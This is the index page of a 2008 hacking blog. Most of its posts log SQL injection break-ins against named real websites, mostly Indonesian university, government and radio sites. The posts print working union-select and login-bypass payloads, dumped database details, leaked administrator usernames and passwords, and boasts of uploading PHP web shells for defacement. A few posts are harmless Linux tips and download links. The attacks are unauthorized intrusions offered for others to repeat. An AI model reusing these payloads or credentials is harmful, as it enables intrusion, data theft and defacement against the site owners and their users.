viperfx07 blog (hack + crack + web + app)

viperfx07 is here to blog about hacking, cracking, website, application, android, and many more.

Tuesday, September 30, 2008

[SQLi] http://www.uny.ac.id

9:07 PM Posted by viperfx07 No comments
Screenshot:Tool: IntelliTamperi found the http://www.uny.ac.id/akademik/refleksi/login.php can be exploited with sql injection. Enter the "' or 'a'='a" (without double quote) to the username and password input box, and voila. You can upload there a php shell, too :D...

[SQLi] http://kemahasiswaan.umm.ac.id

8:09 PM Posted by viperfx07 No comments
login info (usr:pwd) = athox:mayaxI think it can be the exploit for the root domain, too.[+] URL:http://kemahasiswaan.umm.ac.id/detail.php?id_lowongan=-46+union+select+1,2,3,darkc0de[+] Proxy Not Given[+] Gathering MySQL Server Configuration... Database: kemahasiswaan User: guest@10.10.1.1 Version: 5.0.27[+] Showing Tables & Columns from database "kemahasiswaan"[+] 17:03:41[+] Number of Tables:...

http://www.jayabaya.ac.id vulnerability

1:58 AM Posted by viperfx07 No comments
Instead of SQL injection, i try to explore some vulnerability like the previous one from polri.go.id. If you go to http://www.jayabaya.ac.id/infoshow.php?id= you will see an error message.Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/jayabaya/public_html/info/infoisi.php on line 6 MySQL v4 is so tiring, so i left it for now.There is a directory called...

Monday, September 29, 2008

[SQLi]http://www.unitomo.ac.id/

8:08 PM Posted by viperfx07 No comments
go to http://alumni.unitomo.ac.id.login info: labtek:1206.PoC: http://unitomo.ac.id/berita.php?id=-360+union+select+1,concat_ws(0x10,login,password),3,4,5,6,7+from+unitomo.user--So many databases can be accessed from this site. Idiot admin :)Database: alumni backup_blogblogfeblogfhblogfiablogfikomblogfkipblogfpblogfsblogftbloggalerybloglppmblogpascablogperpusblogunitomobursakerjacdcoldtiwebfakult...

Saturday, September 27, 2008

[SQLi] http://www.mustikafm.com/

8:49 PM Posted by viperfx07 No comments
Admin Dir: http://www.mustikafm.com/v1/admin/Admin Login: admin:mstkDump:[+] URL:http://www.mustikafm.com/v1/perempuan.php?id=-7+union+select+darkc0de,2,3,4,5,6[+] Proxy Not Given[+] Gathering MySQL Server Configuration... Database: mustika_proyek User: mustika_proyek@localhost Version: 4.1.22-standard[+] Dumping data from database "mustika_proyek" Table "users"[+] Column(s) ['username', 'password',...

[SQLi] http://www.eljohn.net/

7:38 PM Posted by viperfx07 No comments
Admin Dir = http://www.eljohn.net/Admin Login = admin:admin. idiot admin :)[+] URL:http://www.eljohn.net/pusat/data_pusat.php?level=1&dir_id=6&dir_id0=-5%20union%20select%201,2,darkc0de,4,5[+] Proxy Not Given[+] Gathering MySQL Server Configuration... Database: h18416_info2 User: h18416_nch2@localhost Version: 5.0.32-Debian_7etch6[+] 16:18:20[Database]: h18416_info2[Table: Columns][0]agenda:...

[SQLi] http://www.sonora.co.id

6:49 PM Posted by viperfx07 No comments
PoC: http://www.sonora.co.id/page.php?m=jaringan&i=-1+union+select%201,2,3,4,5,6,7,unhex(hex(concat_ws(0x10,user,password))),9,10,11,12,13,14,15,16+from+mysql.user--Problem: still don't know what to do here :) mysql v4 prevented me to extract the database. Admin directory location is still unknown.Database info:Database: sonora_webUser: aha@localhostVersion: 4.1.7...

[SQLi] http://www.mstrifm.com

6:27 PM Posted by viperfx07 No comments
Problem: where is the admin directory? i juz go to /config, and the username & passwd used there is not from the mysql table.Database info:Database: mstri_mstriUser: mstri_select@localhostVersion: 5.0.45-community-logDump:[+] URL:http://www.mstrifm.com/berita.php?id=-69+union+select+1,darkc0de,3,4,5,6,7,8,9,10,11,12[+] Proxy Not Given[+] Gathering MySQL Server Configuration... Database: mstri_mstri...

[SQLi] http://www.bsi.ac.id/

1:34 AM Posted by viperfx07 No comments
Exploit: http://www.bsi.ac.id/photo.php?album=3'+union+select+1,concat(user,char(58),password),3,4+from+mysql.user--%20and%20'a'='aProblem: I can't find the phpmyadmin or any admin directory. Also, the tables name are so difficult to guess...

Thursday, September 25, 2008

Making the backspace key in Firefox a shortcut key to go back in Ubuntu!

11:40 PM Posted by viperfx07 No comments
Coming from Windows a few months ago, one of the things I took for granted was the backspace key being a shortcut key for the back button on my web browser - Firefox.Once I shifted over to Ubuntu, this shortcut was missing from a default installation. If you want to replicate how the Firefox web browser on Windows has mapped the backspace key to go back a page on linux based systems, do the following:...

Wednesday, September 24, 2008

[SQLi] http://law.ui.ac.id

6:06 PM Posted by viperfx07 No comments
login= username:passwd = admin:admiNProblem: where is the admin dir?Tool: blindext.py (schemafuzz.py can't do it because of below restriction)[+] URL: http://www.law.ui.ac.id/berita.php?bid=380[-] Proxy Not Given[+] Gathering MySQL Server Configuration... [+] MySQL >= v4.0.0 found![+] Showing database version, username@location, and database name![+] 15:08:22[0]: 4.1.11-Debian_4sarge8-log:wwwlaw:wwwlawDatabase...

[SQLi] http://www.smanu1-gsk.sch.id

2:43 PM Posted by viperfx07 No comments
username:passwd = ADMIN:105452Website: http://www.smanu1-gsk.sch.idTool: schemafuzz.py (wow, it's a great tool. I should use it instead of blindext.py)[+] URL:http://www.smanu1-gsk.sch.id/?grp_=galery_&id_=-24%20union%20select%201,darkc0de,3,4,5,6[+] Proxy Not Given[+] Gathering MySQL Server Configuration......

Monday, September 22, 2008

[SQLi] http://www.komnasfbpi.go.id/

12:45 AM Posted by viperfx07 No comments
Exploit: http://www.komnasfbpi.go.id/berita_eng.php?id=-58+union+select+1,2,3,4,pwd,6,7,8,9,10,11,12,13,14+from+tbl_user%20limit%200,1--Problem: When i try to extract the password there, i can't find the right ascii character. What teh hell?...

Sunday, September 21, 2008

[SQLi] http://www.obengware.com

10:57 PM Posted by viperfx07 No comments
admin username = adminadmin passwd = 15287232Problem: where is the admin directory?[+] URL:http://obengware.com/news/index.php?cat_id=&tim=1221955199[+] Proxy Not Given[+] Gathering MySQL Server Configuration... [+] MySQL >= v5.0.0 found![+] Showing database version, username@location, and database name![+] 21:38:25[0]: 5.0.32-Debian_7etch6:t31237_news@localhost:t31237_news [-] 21:52:57[-]...

Friday, September 19, 2008

[SQLi] http://career.sbm.itb.ac.id/

5:42 PM Posted by viperfx07 No comments
Yeah, at last, find an easy sql injection :DWebsite: http://career.sbm.itb.ac.id/Bug: SQL injectionTool: -Method: ' or 'a'='a on login & password textboxYou can deface it by uploading the shell like c99, r57, etc. Here, i have injected the shell. Juz do the rest...

Thursday, September 18, 2008

[SQLi] http://www.unesa.ac.id

9:37 PM Posted by viperfx07 No comments
admin username = ariadmin password = unesahProblem: Where is the admin directory?Website:http://www.unesa.ac.idBug: SQL injectionTool: blindext.pyDumps:[+] URL:http://www.unesa.ac.id/unesa.php?s=berita&xkd=111[+] Proxy Not Given[+] Gathering MySQL Server Configuration... [+] MySQL >= v5.0.0 found![+] Showing all databases current user has access too![+] 17:45:33[+] Number of Rows: 1[0]: webunesa...

[SQLi] http://www.fti-tarumanagara.or.id

9:20 PM Posted by viperfx07 No comments
Another victim :DWebsite: http://www.fti-tarumanagara.or.idBug: SQL injectionTool: blindext.pyDumps:[+] URL:http://www.fti-tarumanagara.or.id/index.php?a=news&detnews=96[+] Proxy Not Given[+] Gathering MySQL Server Configuration... [+] MySQL >= v5.0.0 found![+] Showing database version, username@location, and database name![+] 12:02:19[0]: 5.0.18-nt:root@localhost:dbfti [-] 12:03:12[-] Total...

[SQLi] http://www.unimedia.ac.id

8:58 PM Posted by viperfx07 No comments
After reading some forums, i try an SQL-injection tool called blindext.py from http://forum.darkc0de.com. Simple tool but it's great. Therefore, i try it in some websites that can be exploited with SQL injection. Unfortunately, md5 is hard to break. Need a lot of time to crack it, so i juz leave it uncracked. Here is my first victim :) Website: http://www.unimedia.ac.id/Bug: SQL injectionTool: blindext.pyDumps:[+]...

Wednesday, September 17, 2008

Backtrack 3

2:35 PM Posted by viperfx07 , No comments
Description: CD ImageName:: bt3-final.isoSize: 695 MBMD5: f79cbfbcd25147df32f5f6dfa287c2d9SHA1: 471f0e41931366517ea8bffe910fb09a815e42c7Download: Click here Description: USB Version (Extended)Name:: bt3final_usb.isoSize: 784 MBMD5: 5d27c768e9c2fef61bbc208c78dadf22SHA1: 3aceedea0e8e70fff2e7f7a7f3039704014e980fDownload: Click here Description: VMware ImageName: BACKTRACK3_VMWare.rarSize: 689 MBMD5:...

Ubuntu e-book (recommended)

1:11 AM Posted by viperfx07 , No comments
Beginning Ubuntu Linux, Second EditionDownload: http://rapidshare.com/files/43466056/1590598202.rar Size: 19 MBUbuntu Linux BibleDownload: http://rapidshare.com/files/19526259/Wiley.Ubuntu.Linux.Bible.Jan.2007.rarSize: 21...

polri.go.id is vulnerable, indeed

12:54 AM Posted by viperfx07 No comments
The vulnerability that i found on Sept 6th.Bug = lame protection for webadmin control panel.I change "LAMBANG" into "LaMBANG". actually, i can change the webadmin password but it's too risky.See here:http://www.polri.go.id/indexwide.php?op=profile&type=03The bug is still not fixed by the ad...

Tuesday, September 16, 2008

Intro: Although it's too late to make :)

11:56 PM Posted by viperfx07 No comments
After so many consideration, I decided to continue to write my blog. Hahaha...so what?I decided to share everything i have learned, read, and thought, eventhough it's not a lot.By writing this blog, i want to improve my writing skills in English 'coz i will need it when i go to take my master degree :)So, please, enjoy yourself here. "Don't judge a book by its cover", Tukul said...